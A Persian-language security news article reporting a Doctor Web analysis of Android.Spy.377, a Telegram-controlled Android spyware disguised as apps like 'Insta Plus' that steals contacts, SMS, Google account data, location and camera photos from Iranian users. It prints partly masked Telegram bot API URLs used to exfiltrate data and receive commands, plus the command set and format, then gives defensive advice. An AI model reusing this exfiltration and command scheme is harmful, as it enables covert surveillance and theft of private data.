به گزارش شرکت مهندسی شبکه گستر، محققان امنیتی Doctor Web از انتشار بدافزاری از نوع اسب تروا (Trojan) خبر دادهاند که کاربران ایرانی را بر روی دستگاههای با سیستم عامل Android هدف قرار میدهد. به گفته این محققان اسب تروای مذکور که به Andriod.Spy.377 موسوم شده از طریق پودمانهای تبادل اطلاعات Telegram توسط نویسنده یا نویسندگان خود مدیریت شده و اطلاعات شخصی و خصوصی افراد را سرقت میکند.
Andriod.Spy.377، در حقیقت، یک ابزار دسترسی از راه دور است که تحت پوشش برنامههای دیگری همچون “اینستا پلاس”، “پروفایل چکر” و “Cleaner Pro” و با بهرهگیری از تکنیکهای مهندسی اجتماعی گسترش مییابد.
اسب تروای Android.Spy.377 یک جاسوسافزار سنتی است که قابلیت اجرای دستورات مخرب را داراست. تفاوت اصلی آن با سایر اسبهای تروای تحت سیستم عامل Android قابلیت مدیریت شدن آن از طریق پودمانهای تبادل اطلاعات Telegram است.
بهمحض اجرا شدن، Andriod.Spy به کاربر صاحب دستگاه پیشنهاد میدهد تا از میزان محبوبیت خود در میان سایر کاربران Telegram مطلع شود. در صورت موافقت، از کاربر خواسته میشود که شناسه شخصی Telegram خود را وارد کند.
پس از وارد شدن اطلاعات درخواستی در پنجره مربوطه، Andriod.Spy یک عدد دلخواه را تولید کرده و به کاربر نمایش میدهد. این تابع صرفاً برای جلوگیری از مشکوک به نظر رسیدن اسب تروا است. همچنین برخی اوقات پس از اجرا، Andriod.Spy.377، میانبر (Shortcut) خود را از صفحه اصلی دستگاه حذف کرده و پنجره خود را جهت پنهان ماندن متوقف میکند.
پس از حذف میانبر، Android.Spy.377 فهرست تماسها، پیامکهای ارسالی و دریافتی و اطلاعات حساب کاربری Google کاربر را کپی کرده و آنها را در یک فایل متنی در حافظه جانبی و مسیر /Android/data ذخیره میکند.
فایلهای ایجاد شده توسط اسب تروا عبارتند از: (IMEI به شناسه International Mobile Equipment Identity دستگاه آلوده شده اشاره دارد)
- <imei + numbers.txt> – اطلاعات فهرست تماسها
- <Imei + sms.txt> – تمامی پیامکهای ذخیره شده ارسالی و دریافتی
- <Imei + acc.txt> – اطلاعات حساب کاربری Google کاربر
علاوه بر آن، Android.Spy.377 از طریق دوربین جلویی گوشی اقدام به عکسبرداری کرده و ضمن ارسال عکس گرفته شده و اطلاعات سرقت شده به سرور فرماندهی (Command & Control) خود، پیامی را که به آلوده شدن موفقیتآمیز دستگاه اشاره دارد به ربات Telegram زیر ارسال میکند:
http://api.telegram.org/bot3399*****:AAHeJoVC3i8zzwXhtCQMBoev***********/sendmessage
نمونهای از متن پیام ارسالی در زیر قابل مشاهده است:
chat_id15255796&text=نصب+جدید
[user’s mobile number]
IMEI+:+:8680*******2554
Android+ID+:+fad6c1*******1dc
Model+:+[device name]
***.***.137.202
IMEI2554*******8680+:دستگاه
تصویر زیر نیز نمونهای از مجموعه فایلهای ارسال شده به نویسنده یا نویسندگان Andriod.Spy.377 را نشان میدهد.
به گزارش شرکت مهندسی شبکه گستر، پس از سرقت اطلاعات خصوصی، Andriod.Spy.377 مجدداً از طریق نشانی زیر به ربات Telegram خود متصل شده و منتظر دریافت فرامین کنترلی میماند.
https://api.telegram.org/bot3399*****:AAHeJoVC3i8zzwXhtCQMBoev***********/getupdates?offset=-1
این اسب تروا قادر به دریافت و اجرای فرامین زیر است:
- call – برقراری تماس صوتی
- sendmsg – ارسال پیامک
- getapps – ارسال اطلاعاتی درباره برنامکهای نصب شده به سرور
- getfiles – ارسال اطلاعاتی در مورد تمامی فایلهای در دسترس به سرور
- getloc – ارسال اطلاعات موقعیت جغرافیایی دستگاه
- upload – بارگذاری فایلی که در ادامه دستور مشخص شده است و ذخیره آن فایل بر روی دستگاه
- removeA – حذف فایلی که در ادامه دستور به آن اشاره شده است
- removeB – حذف گروهی از فایلها
- lstmsg – ارسال اطلاعاتی در مورد تمامی پیامکهای ارسالی به سرور؛ این اطلاعات شامل شماره فرستنده، گیرنده و محتوای پیام نیز میشود.
- yahoo – این دستور پیادهسازی نشده است.
قالب فرمان ارسال شده به اسب تروا، به صورت زیر است:
command@imei@parameters
هنگامی که یکی از دستورات فوق اجرا شوند، Andriod.Spy.377 اطلاعات بدست آمده را به ربات Telegram خود ارسال میکند. (در عبارت زیر در قسمت [phoneNumber] شماره تلفن دریافت شده از دستور قرار میگیرد)
https://api.telegram.org/bot3399*****:AAHeJoVC3i8zzwXhtCQMBoev***********/sendmessage?chat_id=275899582&text=call with”+ message[phoneNumber]
علاوه بر جمعآوری اطلاعات خصوصی، هنگامی که اسب تروا فرمانی را از ربات Telegram دریافت کند قادر است به صورت مستقل تمامی پیامکهای ارسالی و دریافتی و مختصات جغرافیایی دستگاه را رصد کرده به محض ارسال و یا دریافت پیامک یا تغییر مختصات جغرافیایی دستگاه، موضوع را به ربات Telegram خود اطلاع دهد.
برای ایمن ماندن از گزند این نوع بدافزارها، رعایت موارد زیر توصیه میشود:
- سیستم عامل و برنامکهای نصب شده بر روی دستگاه همراه خود را همیشه به آخرین نسخه ارتقاء دهید.
- برنامکها را فقط از بازار توزیع دیجیتال رسمی شرکت Googleو (Play Store) یا حداقل بازارهای مورد اعتماد معروف دریافت کنید. همچنین از غیرفعال بودن گزینه Unknown sources در بخش Settings و از فعال بودن گزینه Scan device for security threats در قسمت Google Settings دستگاه اطمینان داشته باشید. با غیرفعال بودن گزینه نخست، از اجرا شدن فایلهای APK میزبانی شده در بازارهای ناشناخته بر روی دستگاه جلوگیری میشود. وظیفه گزینه دوم نیز پایش دورهای دستگاه است.
- پیش از نصب هر برنامک امتیاز و توضیحات کاربران آن را مرور کرده و به نکات منفی توضیحات کاربران بیشتر توجه کنید.
به حق دسترسیهای درخواستی برنامک در زمان نصب توجه کنید. اگر فهرست آن بهطور غیرعادی طولانی بود از نصب آن اجتناب کنید. - از راهکارهای امنیتی قدرتمند برای حفاظت از دستگاههای همراه خود یا سازمانتان استفاده کنید.